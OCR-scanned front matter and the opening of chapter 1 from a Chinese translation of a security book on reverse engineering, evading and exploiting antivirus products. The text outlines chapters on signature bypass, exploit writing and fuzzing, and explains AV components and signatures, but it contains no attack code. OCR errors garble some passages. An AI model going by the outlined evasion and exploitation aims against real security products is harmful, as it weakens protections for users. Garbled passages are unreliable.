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内 容 提 要 
本 书 由 业界 知名 安全 技术 人 员 撰 写 ， 系 统 介绍 了 逆向 工程 反 病毒 软件 。 主 要 内 容 包 括 : 反 病 毒 软件 所 
采纳 的 各 种 具体 手段 ， 攻 击 和 利用 杀毒 软件 的 多 种 常见 方法 ， 杀 毒 软件 市 场 现 状 以 及 未 来 市 场 预 估 。 
本 书 是 逆向 工程 师 、 浴 透 测 试 工程 师 、 安 全 技术 人 员 和 软件 开发 人 员 的 必 读 指南 。 
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感谢 你 购买 并 阅读 本 书 ! 通过 阅读 本 书 , 你 会 了 解 到 有 关 反 病毒 产品 和 逆向 工程 的 知识 。 值 
得 一 提 的 是 , 本 书 所 讨论 的 逆向 工程 的 相关 技术 和 工具 , 不 仅 可 以 应 用 在 反 病毒 软件 上 ,也 可 以 
应 用 于 其 他 软件 产品 。 无 论 你 是 安全 研究 员 、 渗 透 测 试 工程 师 还 是 其 他 领域 的 信息 安全 专家 , 都 
可 以 从 本 书 中 受益 。 当 然 ， 如 果 你 是 反 病毒 工程 师 ， 同 样 能 从 中 受益 ， 因 为 你 将 了 解 到 攻击 者 如 
何 分 析 反 病毒 产品 ,如 何 将 其 拆 分 成 不 同 模 块 , 以 及 你 该 如 何 避 免 反 病毒 产品 被 攻破 或 者 如 何 增 
加 破解 难度 。 

我 想 强 调 的 是 , 虽然 本 书 重点 在 于 讲述 与 反 病 毒 产 品 相关 的 理论 知识 , 但 是 也 提供 了 一 些 实 
战 案例 ， 展 示 了 如 何在 实际 的 应 用 程序 中 运用 逆向 工程 、 漏 洞 按 气 和 漏洞 利用 技术 。 


本 书 概述 


本 书 专 为 那些 想 更 好 地 了 解 反 病毒 产品 功能 实现 原理 的 读者 而 撰写 , 无 论 你 身 处 攻防 战役 中 
的 哪 一 个 阵营 ， 都 不 妨 研读 一 番 。 本 书 旨 在 帮助 你 了 解 在 实战 过 程 中 针对 特定 的 任务 目标 , 何 时 
以 及 如 何 选用 正确 的 技术 和 工具 , 同时 又 该 重点 关注 反 病 毒 产 品 的 哪些 部 分 。 如果 下 列 描 述 中 有 
一 条 或 多 条 与 你 的 情况 相 吻 合 ， 那 么 没 错 ， 本 书 就 是 为 你 而 写 的 : 
口 想 更 深入 地 了 解 反 病毒 产品 的 安全 性 ; 
Q 想 更 深入 地 了 解 逆 向 工程 的 相关 技术 ( 也许 目 的 是 逆向 分 析 反 病毒 产品 ); 
a 想 绕 过 反 病 毒 产品 的 防护 体系 ; 
口 想 动 手 将 反 病毒 产品 拆 分 成 多 个 模块 ; 
口 想 编写 攻击 反 病毒 产品 的 漏洞 利用 程序 ; 
口 想 评估 反 病 毒 产品 ; 
口 想 从 整体 上 提高 自己 的 反 病 毒 产 品 的 安全 性 ， 或 者 想 知 道 如 何 编写 防御 性 代码 以 对 付 攻 
击 性 代码 ; 
O 热爱 编程 ， 或 者 想 丰 富 信息 安全 领域 的 相关 知识 ， 提 升 技术 水 平 。 


本 书 结构 
全 书 内 容 组 织 如 下 。 












































































































































第 1 章 ， 反 病毒 软件 入 门 ” 带 你 一 览 反 病毒 软件 的 历史 ， 同 时 探讨 目前 市 场 上 主流 反 病 毒 产 
品 的 典型 及 非典 型 功能 。 

$23, iG IJ S 介绍 如 何 通过 调试 反 病 毒 软 件 或 禁用 反 病 毒 软 件 的 自我 保护 功能 等 
相关 技巧 来 道 向 分 析 反 病毒 产品 ,这 一 章 还 将 探讨 如 何 结合 逆向 工程 技术 使 用 Python 为 Avast for 
Linux 编写 附加 组 建 程序 ， 并 介绍 一 款 使 用 C/C++ 为 Comodo for Linux 反 病 毒 软件 编写 的 非 官 方 
软件 开发 工具 包 (software development kit, SDK )。 

第 3 章 ， 插 件 系统 讨论 各 式 反 病毒 产品 是 如 何 使 用 插件 的 ， 这 些 插件 是 如 何 被 加 载 和 分 发 
的 ， 以 及 使 用 反 病 毒 插件 的 目的 。 

第 4 章 ， 反 病毒 特征 码 技术 带 你 一 览 反 病毒 产品 中 最 典型 的 几 种 特征 码 技术 ， 以 及 一 些 高 
级 特征 码 。 

第 5 章 ,， 反 病毒 软件 的 更 新 系统 阐释 反 病 毒 软件 是 如 何 实现 更 新 的 ， 更 新 系统 是 如 何 开发 
HJ, 以 及 更 新 协议 是 如 何 工作 的 。 这 一 章 末 尾 还 将 通过 一 个 实例 展示 如 何 逆向 分 析 一 个 简易 的 更 
新 协议 。 

第 6 章 ， 绕 过 反 病 毒 软件 概述 如 何 绕 过 反 病 毒 软 件 ， 使 程序 文件 避 开 相关 检测 。 这 一 章 将 
讨论 一 些 一 般 性 技巧 ， 并 且 探 讨 应 该 避免 使 用 的 技术 。 

第 7 章 ， 绕 过 特征 码 识别 ” 紧 接 第 4 章 内 容 ， 带 领 你 探索 如 何 绕 过 各 种 特征 码 检测 技术 。 

第 8 章 ， 绕 过 扫描 器 以 反 病 毒 扫 描 需 为 核心 ， 继 续 讨 论 如 何 绕 过 反 病 毒 软 件 。 这 一 章 将 介 
绍 如 何 绕 过 静态 启发 式 扫 描 引 擎 、 反 汇编 、 反 模拟 和 其 他 反 病 毒 技术 ,还 将 介绍 如 何 编写 一 个 用 
以 生成 绕 过 反 病 毒 扫描 器 检测 的 可 执行 文件 的 自动 化 工具 。 

第 9 章 ， 绕 过 启发 式 引 擎 展示 如 何 同时 绕 过 反 病 毒 软件 采用 的 静态 和 动态 启发 式 引 擎 ， 以 
此 来 结束 反 病 毒 防护 绕 过 技术 的 讨论 。 

第 10 章 ， 确 定 攻 击 面 介绍 攻击 反 病 毒 产品 的 有 关 技 术 ， 指 导 你 发 现 反 病毒 软件 暴露 的 本 
地 和 远程 攻击 面 。 

第 11 章 ， 拒 绝 服务 攻击 “讨论 如 何 利用 反 病 毒 软 件 的 漏洞 和 缺陷 ， 在 本 地 和 远程 向 反 病 毒 
产品 发 起 拒绝 服务 攻击 。 

第 12 章 ， 静 态 分 析 ”带领 你 学 习 如 何 静 态 审计 反 病 毒 软件 来 挖掘 其 中 存在 的 漏洞 ， 包 括 一 
些 真 实 案例 。 

$133, 动态 分 析 ”继续 讨论 如 何 挖 气 反 病毒 产品 的 漏洞 ， 但 这 里 将 利用 动态 分 析 技 术 。 
这 一 章 将 会 重点 介绍 现今 最 流行 的 漏洞 挖掘 方法 一 一 模糊 测试 , 并 向 你 阐释 如 何 搭 建 一 个 统一 管 
理 的 分 布 式 模糊 测试 工具 ， 来 自动 挖掘 和 分 析 反 病毒 产品 的 缺陷 。 

第 14 章 ， 本 地 攻击 “介绍 利用 本 地 漏洞 攻击 反 病 毒 产 品 的 过 程 ， 并 将 重点 关注 逻辑 漏洞 、 
后 门 和 内 核 泄 漏 的 利用 。 

第 15 章 ,远程 漏洞 讨论 如 何 利 用 反 病 毒 产品 中 的 内 存 损坏 漏洞 ， 编 写 远 程 漏洞 利用 程序 。 
同时 , 还 将 展示 如 何 针对 反 病 毒 软件 的 更 新 服务 进行 攻击 , 并 给 出 一 个 针对 某 个 更 新 服务 协议 的 
完整 的 漏洞 利用 程序 。 

第 16 章 ， 当 前 反 病 毒 防护 趋势 ”讨论 利用 反 病 毒 软件 缺陷 的 攻击 者 会 瞄准 哪些 反 病 毒 产 品 
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HP, 而 哪些 用 户 不 太 可 能 成 为 该 类 恶意 攻击 的 目标 。 同时 ,本章 还 会 带 你 一 帘 滋 生 该 类 缺陷 的 
“黑暗 世界 ”。 

第 17 章 ， 一些 建议 和 未 来 展望 ”最 后 ,为 反 病毒 软件 的 用 户 和 供应 商 提供 一 些 建议 ， 并 展 
望 未 来 反 病毒 产品 可 以 采用 哪些 防护 策略 。 


目标 读者 


本 书 主 要 面向 拥有 中 级 技术 水 平 的 个 人 开发 者 和 逆向 工程 师 , 不 过 资深 逆向 工程 师 同 样 会 从 
本 书 所 讨论 的 技术 内 容 中 获 益 。 如果 你 是 反 病毒 工程 师 或 恶意 软件 逆向 工程 师 , 那么 本 书 能 帮助 
你 了 解 攻击 者 会 如 何 利用 软件 漏洞 。 同 时 ,本 书 也 阐释 了 如 何 避 免 一 些 不 利 情况 ,如 攻击 者 利用 
你 的 反 病毒 产品 中 的 漏洞 攻击 你 要 保护 的 用 户 。 

更 资深 的 专业 人 士 可 以 通过 阅读 本 书 的 几 个 特定 章节 ,来 获得 更 多 的 相关 知识 和 技能 。 比如， 
如 果 你 想 要 了 解 如 何 编写 针对 反 病 毒 软件 的 本 地 和 远程 攻击 利用 程序 , 可 以 参考 第 三 部 分 “分 析 
与 攻击 "。 在 该 部 分 中 ， 你 将 了 解 从 确定 攻击 面 开 始 到 发 现 漏洞 再 到 利用 漏洞 的 整个 过 程 。 如 果 
你 对 绕 过 反 病 毒 防护 感 兴趣 ， 那 不 妨 参考 第 二 部 分 “ 绕 过 反 病 毒 软件 "。 总 之 ， 你 可 以 从 头 到 尾 
阅读 本 书 ， 也 可 以 根据 自己 的 需求 ， 有 选择 性 地 进行 阅读 。 


MRLE 


强烈 的 求知 欲 是 你 阅读 本 书 前 最 需要 的 准备 。 尽管 我 已 经 尝试 尽 可 能 在 书 中 使 用 开源 的 免费 
软件 来 做 演示 , 但 是 有 的 地 方 还 是 会 用 到 一 些 收费 软件 。 比 如 , 在 本 书 的 很 多 案例 中 ,我 用 到 了 
商业 版 软件 IDA， 因 为 除 个 别 软件 外 , 大 多 数 反 病 毒 产品 都 是 闭 源 的 商业 软件 。 这 就 要 求 我 们 在 
分 析 过 程 中 用 到 逆向 软件 ， 而 IDA 是 最 常用 的 一 款 。 其 他 所 需 的 工具 包括 编译 吉 、 解 释 器 (LU 
如 Python ) 和 其 他 一 些 没 有 开源 但 是 可 以 免费 下 载 的 工具 ， 比 如 Sysinternals。 


网 络 资源 


为 了 让 你 能 够 简单 快速 上 手 , 本 书 中 可 能 需要 用 到 的 一 些 基 础 工具 都 可 以 在 Wiley 为 本 书 建 
立 的 页 面 上 下 载 : http://www.wiley.com/go/antivirushackershandbook。 










































































总 结 

本 书 旨 在 帮助 读者 了 解 反 病毒 产品 是 什么 、 不 是 什么 ,以 及 对 它们 应 该 有 什么 期 待 ; 这 些 信 
息 可 能 并 不 为 大 众 所 熟 知 。 本 书 并 不 是 要 阐释 反 病毒 产品 的 工作 原理 , 而 是 展示 在 你 可 能 正在 使 
用 的 反 病毒 软件 中 真实 存在 的 漏洞 缺陷 、 漏 洞 利用 代码 和 相关 技术 。 同 时 ,本 书 还 深入 探讨 了 绕 
过 反 病 毒 产品 的 防护 技巧 , 以 及 相关 的 漏洞 挖掘 和 利用 方式 。 学习 如 何 攻 破 反 病毒 产品 不 仅 对 攻 
击 者 们 来 说 大 有 神 益 , 也 可 以 帮助 你 理解 如 何 提 升 反 病毒 产品 的 防护 效果 ,以 及 反 病 毒 产 品 的 用 























户 如 何 才能 最 大 程度 地 保护 自己 。 
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boo Se CU ERE SE cd piod us e 下 意 软件 感染 ,并 适时 移 除 恶意 软件 , 使 计算 机 脱 
离 感染 状态 。 在 本 书 中 ， 恶 意 软 件 (malicious software 或 malware ) 也 称 为 “样本 ”， 它 有 许多 种 
类 ， 包括 木马 病毒 、 感 染 型 病毒 Rootkit、 下 载 者 病毒 、 蠕 虫 病毒 等 。 

本 章 将 阐述 反 病 毒 (antivirus, AV ) 软件 的 定义 及 其 工作 原理 。 同 时 ， 还 将 介绍 反 病 毒 软件 
的 简 史 ， 并 简单 分 析 反 病毒 软件 的 演进 。 


1.4 何谓 反 病 毒 软件 


反 病 毒 软件 是 旨 在 为 原生 操作 系统 (如 Windows、Mac OS X ) 提供 更 好 安全 防护 的 特殊 软件 。 
在 多 数 时 候 , 它 被 用 作 预 防 性 安全 方案 。 一 旦 防护 失效 , 反 病 毒 软件 就 成 了 从 操作 系统 中 彻底 清 
除 恶 意 软 件 、 使 计算 机 摆脱 感染 的 解决 方案 à 

反 病 毒 软件 使 用 多 种 技术 来 侦 测 潜藏 在 操作 系统 深 处 旦 带 有 自我 保护 功能 的 恶意 软件 ,高 级 
恶意 软件 可 能 会 使 用 未 公开 的 系统 功能 和 混淆 技术 来 躲避 侦 测 并 持续 潜伏 在 计算 机 中 。 如 今 , 用 
户 面临 着 来 自 四 面 八方 的 安全 威胁 , 反 病 毒 软件 的 使 命 就 是 处 理 出 自 可 信 以 及 不 可 信 来 源 的 恶意 
文件 。 反 病毒 软件 要 处 理 的 恶意 文件 来 源 有 : 网 络 数据 包 、 邮 件 附件 、 浏览 器 漏洞 攻击 利用 程序 
文档 阅读 器 ， 以 及 运行 在 操作 系统 上 的 可 执行 程序 。 


1.2. 反 病 毒 软件 的 历史 与 现状 


最 早 的 反 病毒 产品 在 严格 意义 上 只 能 算 作 扫 描 带 ， 因 为 它们 仅 是 在 可 执行 程序 中 侦 测 恶意 
代码 的 命令 行 扫描 程序 。 不 过 ， 在 此 之 后 ， 反 病毒 软件 经 历 了 天 翻 地 覆 的 变化 。 比 如 ， 反 病毒 
软件 已 不 再 含有 命令 行 式 的 扫描 器 了 。 如 今 ,大 多 数 反 病毒 产品 有 了 图 形 用 户 界 面 ( graphical user 
interface，GUI )， 会 检查 操作 系统 或 用 户 程序 产生 、 修 改 或 访问 的 每 一 个 文件 。 它 们 还 配备 了 
防火 墙 功 能 ， 来 侦 测 通过 网 络 感染 计算 机 的 恶意 文件 ; 安装 了 浏览 器 插件 ， 来 侦 测 基于 Web 的 
漏洞 利用 攻击 ; 为 网 络 支 付 创造 了 安全 隔离 环境 ; 从 系统 驱动 底层 ， 实 现 了 自我 防护 和 安全 沙 
盒 功能 等 。 

在 DOS 和 其 他 古老 的 操作 系统 时 期 ,软件 产品 只 需要 跟随 系统 更 新 而 更 新 。 但 在 此 之 后 , 随 
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着 数量 惊人 的 恶意 软件 产生 , 反 病 毒 软件 也 不 断 提 高 了 更 新 的 频率 。20 世 纪 90 年 代 , 反 病 毒 企业 
在 一 周 内 只 会 收 到 几 个 关于 恶意 程序 的 报告 ， 而 且 往往 都 是 文件 感染 型 病毒 ; 而 如 今 , 它 每 天 都 
会 收 到 成 千 上 万 完全 不 同 的 恶意 文件 样本 ( 这 里 的 “不 同 ” 是 指 类 似 MD5、SHA-1 文 件 散 列 值 不 
同 )。 这 迫使 反 病毒 企业 致力 于 开发 自动 化 侦 测 方案 ， 类 似 启 发 式 引 擎 (heuristics )， 通 过 动态 和 
静态 两 种 手段 来 侦 测 未 知 病毒 。 第 3 章 和 第 4 章 将 会 深入 探讨 反 病 毒 软件 的 工作 原理 。 

金钱 是 驱使 恶意 软件 和 反 病 毒 软件 产品 频繁 升级 对 抗 的 根本 原因 。 早期, 病毒 制作 者 (virus 
creator 或 vxer ) 往往 只 是 因为 想 博 人 眼球 或 挑战 自我 而 编写 一 些 采取 新 破坏 手段 的 文件 感染 型 病 
毒 。 如 今 ， 恶 意 软 件 开 发 已 经 成 了 硕 诈 计算 机 用 户 的 肾 利 产业 。 无 论 是 偷 取 用 户 在 诸如 eBay、 
Amazon、Gmail 等 网 站 的 账户 登录 凭证 ， 还 是 入 侵 用 户 在 支付 平台 ( 如 Paypal ) 的 账号 ， 其 最 终 
目的 是 一 致 的 : 不 择 手段 地 获取 尽 可 能 多 的 钱财 。 
恶意 软件 制作 者 可 以 通过 病毒 窃取 你 的 Yahoo 邮 箱 或 Gmail 登录 凭证 , 然后 以 你 的 名 义 向 别 的 
用 户 大 量 扩散 垃圾 邮件 或 传播 恶意 软件 。 他 们 还 可 以 使 用 窃取 到 的 信用 卡 信息 将 你 账户 内 的 资金 
转移 到 恶意 账户 上 去 ， 或 是 通过 “ 钱 又 ”洗钱 。 因 此 ， 他 们 的 犯罪 活动 正 变 得 越 来 越 难以 追踪 。 

另 一 种 日 益 典 型 的 恶意 软件 主要 用 以 监听 民众 的 通信 ， 其 幕后 推手 是 权利 机 构 、 灰 色 组 织 ， 
或 是 向 权利 机 构 出 售 间 谍 软 件 的 黑客 公司 。 也 有 一 些 恶 意 软件 开发 是 为 了 破坏 他 国 的 基础 设施 。 
恶意 软件 也 可 以 为 了 监视 政府 机 构 、 公 司 或 个 人 而 开发 。 监 视 软 件 的 两 个 典型 案例 是 
FinFisher 和 Hacking Team。 政 府 、 执 法 部 门 和 安全 部 门 采购 商业 版 的 FinFisher 和 Hacking Team 来 
监视 罪犯 和 嫌疑 人 。 
恶意 软件 的 换代 升级 以 及 恶意 软件 市 场 大 量 的 资本 涌 入 , 迫使 反 病毒 工业 在 最 近 十 年 内 发 生 
了 显著 的 改变 和 升级 。 遗 憾 的 是 ,在 攻防 博弈 中 , 反 病 毒 软 件 一 直 处 在 被 动 局 面 。 通 常 ， 反 病毒 
软件 厂商 无 法 侦 测 未 知 病毒 , 尤其 是 那些 在 开发 过 程 中 采取 了 一 些 免 杀 手段 的 恶意 软件 。 这 其 中 
的 原因 很 简单 : 免 杀 是 恶意 软件 开发 的 重要 一 环 ; 对 于 攻击 者 来 说 , 保证 开发 的 恶意 软件 不 被 反 
病毒 软件 查 杀 ， 时 间 越 长 越 好 。 无 论 是 否 合法 , 许多 商业 版 本 的 恶意 软件 包 都 有 一 定 的 支持 服务 
期 限 ,在 服务 支持 期 间 , 恶意 软件 产品 会 根据 反 病 毒 软件 或 是 操作 系统 的 查 杀 情况 适时 作出 更 新 。 
另外， 恶意 软件 也 会 通过 升级 来 应 对 和 修补 bug， 添 加 新 功能 等 。 反 病毒 软件 也 可 能 成 为 攻击 目 
标 ， 比 如 有 幕后 支持 的 Mask 病 毒 ， 就 利用 了 卡巴 斯 基 的 一 个 零 日 漏洞 。 


1.3 反 病 毒 扫描 器 、 内 核 和 产品 


通常 , 计算 机 用 户 可 能 只 会 把 反 病 毒 软件 简单 地 看 成 一 个 软件 套装 , 但 是 攻击 者 必须 要 有 从 
更 深层 次 来 分 析 反 病毒 软件 的 能 力 。 
本 章 将 详细 阐释 反 病毒 软件 的 各 个 组 成 部 分 : 反 病 毒 内 核 、 命 令 行 扫描 器 、GUI 扫 描 带 、 守 
护 进 程 或 系统 服务 、 文 件 系统 防护 驱动 、 网 络 防护 驱动 ， 以 及 反 病 毒 软件 的 其 他 一 些 功能 模块 。 
以 ClamAV 为 例 ， 它 是 一 个 扫描 器 ,也 是 目前 仅 有 的 一 款 开 源 反 病 毒 软件 。 它 的 工作 方式 是 ， 
根据 特征 扫描 计算 机 内 的 恶意 软件 ,每 查 杀 到 一 个 恶意 软件 ,就 生成 一 条 警告 消息 .不 过 , ClamAV 
既 没 有 使 用 基于 文件 行为 的 启发 式 查 杀 系 统 ， 也 没有 修复 感染 文件 的 能 
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换 句 话说 , 反 病毒 内 核 就 是 反 病毒 产品 的 核心 。 比 方 说 ，ClamAV 的 核心 是 libclam.so 库 。 所 
有 可 执行 文件 脱 壳 程序 、 压 缩 程序 、 加 密 程序 和 保护 程序 等 都 由 这 个 库 实现 。 所 有 有 关 解 包 并 
遍历 PDF 文 件 中 被 压缩 的 数据 流 内 容 ， 或 枚 举 并 分 析 OLE2 容 右 中 内 容 ( 如 Microsoft Word 文 档 ) 
的 代码 ， 同 样 包含 在 这 个 库 中 。 使 用 该 反 病 毒 内 核 的 包括 一 款 叫 作 clamscan 的 扫描 器 ， 除 此 以 
外 还 有 clamd 实 时 防护 程序 ， 以 及 其 他 一 些 程序 和 库 ， 比 如 一 个 叫 作 PyClamd 的 Python bindings 
API 程 序 。 








提示 反 病 毒 软件 常常 会 使 用 不 止 一 个 反 病 毒 引擎 或 内 核 , 例如 , F-Secure 除 使 用 自家 的 反 病 毒 
引擎 外 ， 还 融入 了 Bitdefender 的 授权 引擎 。 





反 病 毒 产品 可 能 并 不 会 向 第 三 方 开发 者 提供 直接 调用 其 内 核 的 方法 , 但 可 能 会 提供 调用 命令 
行 扫 描 融 的 接口 。 男 外 还 有 一 些 反 病毒 产品 甚至 连 调 用 命令 行 扫描 带 的 接口 都 不 会 提供 , 而 是 
仅 提供 GUI 扫描 顺 或 是 GUI 程序 ， 用 来 配置 实时 防护 或 该 产品 中 的 其 他 模块 ， 以 侦 测 和 修复 恶意 
软件 感 娄 。 反 病毒 套装 还 会 提供 一 些 其 他 的 安全 防护 程序 ， 如 安全 浏览 器 、 浏 览 顺 安全 工具 栏 、 
自我 保护 驱动 、 防 火 墙 等 。 

可 以 看 到 ， 反 病毒 产品 其 实 是 软件 公司 提供 给 顾客 的 防护 软件 包 。 其 中 , 扫描 器 用 来 扫描 文 
件 和 目录 ， 而 包含 核心 功能 的 反 病 毒 内 核 被 用 在 了 反 病 毒 软件 更 高 级 别 的 组 成 部 分 中 ， 比 如 GUI 
Titia m TEM o 


1.4 反 病 毒 软件 的 典型 误区 


大 多 数 反 病毒 软件 用 户 深 信 ， 安 全 防护 产品 是 坚不可摧 的 防弹 墙 ， 只 要 装 上 了 反 病 毒 软件 ， 
他 们 的 电脑 就 安全 了 。 这 种 观念 是 不 正确 的 , 但 如 果 你 去 反 病毒 软件 论坛 的 评论 区 去 看 看 ， 却 会 
发 现 这 种 观点 十 分 常见 ， 比 如 :“ 我 感染 了 某 某 病毒 。 怎 么 会 这 样 ? 我 可 是 安装 了 某 某 某 杀 毒 软 
件 的 啊 !1” 

要 解释 安装 了 反 病 毒 软件 并 不 能 获得 百分之百 保护 的 原因 , 让 我 们 先 来 看 看 现代 反 病 毒 软件 
的 基础 功能 : 
口 侦 测 程序 中 已 知 的 恶意 代码 及 其 风险 操作 ; 
a 侦 测 文档 和 网 页 中 的 已 知 恶 意 代 码 ; 
a 侦 测 网 络 数据 包 中 的 已 知 恶 意 代 码 ; 
a 基于 先前 的 已 知 经 验 ， 修 改 并 发 现 新 的 恶意 行为 和 代码 。 

你 可 能 已 经 注意 到 ， 上 面 提 到 的 每 一 条 功能 中 都 有 “已 知 ” 二 字 。 因 此 ， 反 病毒 软件 产品 
不 是 战胜 恶意 软件 的 终极 方案 ,一 款 反 病毒 产品 是 无 法 识别 未 知 恶 意 代 码 的 。 很 多 反 病毒 软件 
的 营销 信息 可 能 会 让 用 户 误 以 为 ， 只 要 安装 了 他 们 的 反 病毒 软件 就 可 以 高 枕 无 忧 了 ; 但 是 这 与 
实际 情况 大 相 径 庭 。 无 论 反 病毒 产品 的 广告 是 如 何 宣 传 的 ， 反 病毒 软件 目前 只 能 基于 已 知 的 恶 
意 软 件 特 征 进行 防护 。 除 非 基 于 之 前 的 已 知 模式 ( 动态 或 静态 ), 否则 反 病毒 软件 是 无 法 识别 新 
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型 未 知 风险 的 。 
1.5 ” 反 病 毒 软件 功能 


所 有 反 病 毒 产品 都 有 一 系列 相同 的 功能 特性 , 因此 ， 了 解 一 款 产 品 有 助 于 触 类 旁 通 ， 从 而 了 
解 其 他 的 产品 系统 。 下 面 是 反 病 毒 产 品 共有 的 功能 : 
口 能 够 扫描 压缩 文件 和 加 壳 的 可 执行 文件 ; 
口 能 够 按 需 或 实时 扫描 可 执行 文件 或 目录 ; 
口 拥有 防止 恶意 软件 攻击 反 病毒 软件 进程 的 保护 驱动 程序 ; 
口 拥有 防火 墙 和 网 络 流量 监控 功能 ; 
口 拥有 命令 行 和 图 形 界面 工具 集 ; 
口 拥有 守护 进程 或 服务 ; 
口 拥有 管理 控制 台 。 
接 下 来 , 我 们 将 简要 地 讨论 一 些 反 病毒 产品 中 都 会 有 的 功能 特性 , 以 及 一 些 只 有 在 特定 反 病 
毒 产 品 中 才 会 有 的 高 级 功能 。 


1.5.1 基础 功能 


为 了 保证 可 用 性 , 一 款 反 病毒 产品 应 该 拥有 满足 日 常 需求 的 基础 功能 。 例 如 ,最 基本 的 要 求 
是 ， 反 病毒 扫描 顺和 引擎 工作 起 来 应 该 快速 ， 且 内 存 消耗 非常 小 。 

1. 使 用 本 机 语言 

大 多 数 反 病 毒 引 擎 〈 除 了 旧版 本 的 Malwarebytes， 它 不 是 一 个 完整 的 反 病 毒 产品 ) 都 是 采用 
非 托管 语言 /本 机 语言 编写 的 ， 比 如 C、C++ 或 是 两 者 的 结合 。 反 病毒 引擎 必须 在 不 影响 系统 性 能 
的 情况 下 ， 和 运行 得 足够 快 。 本 机 语言 就 很 好 地 满足 了 这 点 需求 ， 因 为 当代 码 编译 之 后 ， 就 能 在 目 
标 主机 的 CPU 中 全 速 运行 。 对 于 托管 式 软件 来 说 ,已 编译 的 代码 会 被 映射 成 字 节 码 格式 。 这 往往 















































需要 额外 的 层 结构 来 提供 运行 环境 : 一 个 内 置 在 反 病 毒 内 核 中 的 、 知 道 如 何 执行 字 节 码 的 虚拟 机 
解析 程序 。 

举例 来 说 ，Android DEX 文 件 、Java 以 及 .NET 编 写 的 代码 都 需要 虚拟 机 来 运行 已 编译 的 字 节 
代码 。 正 是 因为 不 需要 额外 的 层 结构 来 提供 运行 环境 ， 就 使 得 类 似 C、C++ 的 本 机 语言 的 性 能 优 
于 前 面 提 到 的 托管 式 语言 。 不 过 , 使 用 本 机 语言 编写 程序 也 有 不 少 缺陷 。 采 用 本 机 语言 编写 程序 
难度 更 大 , 也 更 容易 造成 内 存 及 系统 资源 泄漏 , 引发 内 存 骨 溃 ( 堆 溢 出 .use-after-free , double-free ) 
问题 ， 或 写 出 造成 严重 系统 安全 问题 的 bug。 相 较 于 托管 式 编程 语言 (如 .NET、Python 和 Lua ), 
无 论 是 C 还 是 C++ 都 没有 针对 内 存 骨 溃 问题 的 防护 机 制 。 本 书 第 3 章 将 会 详 述 解析 需 中 的 漏洞 ， 同 
时 揭秘 为 什么 这 是 反 病 毒 软件 出 现 bug 的 重 灾区 。 

2. 扫描 器 

反 病 毒 产品 的 另 一 个 共有 功能 是 扫描 器 。 在 大 多 数 情况 下 , 它们 可 能 只 是 有 用 户 图 形 界面 或 
命令 行 的 手动 扫描 器 。 当 用 户 想 要 检测 某 些 文件 、 目 录 或 系统 内 存 的 安全 性 时 ,这 类 工具 就 有 了 
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用 武之 地 。 另外 , 还 有 一 种 后 台 实 时 扫描 器 , 我 们 一 般 称 之 为 实时 防护 或 者 反 病 毒 常 驻防 护 进 程 。 
这 类 扫描 器 会 实时 监测 分 析 操 作 系 统 或 其 他 程序 ( 比如 浏览 器 ) 的 每 一 个 读 取 、 创 建 、 修 改 操 作 ， 
来 防止 系统 内 文档 和 程序 被 病毒 感染 ， 阻 止 已 知 恶 意 文件 执行 。 

反 病 毒 软件 的 实时 防护 模块 是 所 有 攻击 面 中 最 有 意思 的 一 个 部 分 。 比 方 说 ，Microsoft Word 
文档 中 分 析 模 块 的 一 个 bug 可 能 会 在 用 户 下 载 了 一 个 恶意 的 Microsoft Word 文 档 以 后 , 使 实时 防护 
模块 被 利用 而 执行 任意 代码 ， 即 便 用 户 并 没有 打开 这 个 恶意 文档 。 无 独 有 偶 , 反 病 毒 软件 邮件 防 
护 模块 中 的 一 个 安全 漏洞 , 也 可 能 会 在 用 户 接收 了 一 封 带 有 恶意 附件 的 邮件 以 后 ,， 当 反 病 毒 软件 
相关 模块 试 着 去 分 析 邮 件 客 户 端 创建 的 临时 文件 安全 性 时 , 触发 恶意 代码 。 当 这 类 可 以 造成 拒绝 
服务 的 bug 被 触发 以 后 ， 除 非 用 户 手 动 重启 相关 防护 功能 ， 否 则 反 病 毒 软件 将 会 陷入 持久 的 骨 演 
和 死 循环 中 。 

3. 特征 码 

反 病 毒 产 品 的 扫描 器 借助 特征 码 库 ， 侦 测 并 发 现 亚 意 文 件 或 文件 包 。 同 时 ,每 一 种 特征 码 都 
有 对 应 的 恶意 软件 名 称 。 这 里 所 说 的 特征 码 ， 也 就 是 已 知 恶 意 文件 独一无二 的 文件 “指纹 ”。 一 
些 典型 日 基础 的 特征 码 扫 描 功 能 基于 简单 的 “指纹 ”匹配 技术 ( 比方 说 , 匹配 发 现 特定 的 字符 串 ， 
如 EICAR 字 符 串 )、CRC 校 验 码 或 文件 MD5 散 列 值 。 如 果 仅 依靠 类 似 MD5 值 的 密 散 列 特征 码 的 匹 
配 技术 ， 只 能 有 针对 性 地 检 出 特征 码 对 应 的 单个 文件 〈 散 列 值 只 能 标识 特定 的 文件 )。 如 果 基 于 
模糊 逻辑 的 特征 码 技术 , 将 特定 的 数据 区 块 作为 CRC 校 验算 法 的 匹配 特征 , 就 可 以 识别 检测 到 相 
对 多 的 恶意 文件 ( 与 标识 整个 文件 正好 相反 )。 

正如 第 8 章 所 述 ， 不 同 的 反 病 毒 产品 所 使 用 的 特征 码 技术 也 会 有 所 不 同 。 特 征 码 技术 有 的 基 
于 CRC 校 验 技 术 , 也 有 的 基于 PE 文件 头 特征 、 可 执行 文件 入 口 代码 复杂 性 ,以 及 整个 或 部 分 可 执 
TTOCU E BEES 有 时 , 文件 特征 码 识别 技术 也 基于 对 进行 可 执行 程序 入 口 点 代码 分 析 时 发 现 的 基 
本 块 ， 除 此 以 外 还 有 其 他 一 些 特征 码 检测 技术 。 

每 一 种 特征 码 检测 方式 都 各 有 利弊 。 比 如 说 , 一 些 反 病毒 产品 使 用 的 特征 码 检测 技术 十 分 精 
准 ， 不 容易 发 生 误 报 (将 一 个 正常 文件 标记 为 恶意 软件 )， 另 外 一 些 则 十 分 敏感 ， 误 杀 率 很 高 。 
举 个 例子 ， 如 果 反 病毒 软件 把 以 “MZ\x90” 字 节 开 头 的 Microsoft Word 文 档 作为 一 条 查 杀 特征 ， 
那么 无 论文 档 是 否 正 常 ， 都 将 被 标记 为 恶意 软件 。 因 此 ,为 了 避免 误 报 ,， 在 添加 特征 码 的 时 候 必 
须 慎 之 又 慎 ， 否 则 就 会 造成 图 1-1 中 显示 的 误 报 或 者 漏 报 〈 恶意 软件 被 误 认 为 是 正常 文件 )。 
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CO M [0] [»] [0] Antivirus Alert 


AM TrojWare.Win32.Trojan.XPack.~gen1@@107336679 





Location: CaidaB5ioadersiqnx.Idw 


More information: Unavailable 


Ignore ES 
lgnores the alert and allows the file operation 


Ignore Once 
Ignore ani id Add to Exclusions 
